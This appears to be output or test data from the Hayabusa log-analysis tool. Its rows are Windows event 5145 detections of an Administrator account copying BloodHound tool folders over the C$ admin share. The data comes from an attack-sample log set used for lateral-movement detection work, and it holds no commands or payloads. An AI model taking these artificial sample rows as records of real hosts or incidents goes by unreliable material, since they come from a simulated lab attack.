+2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
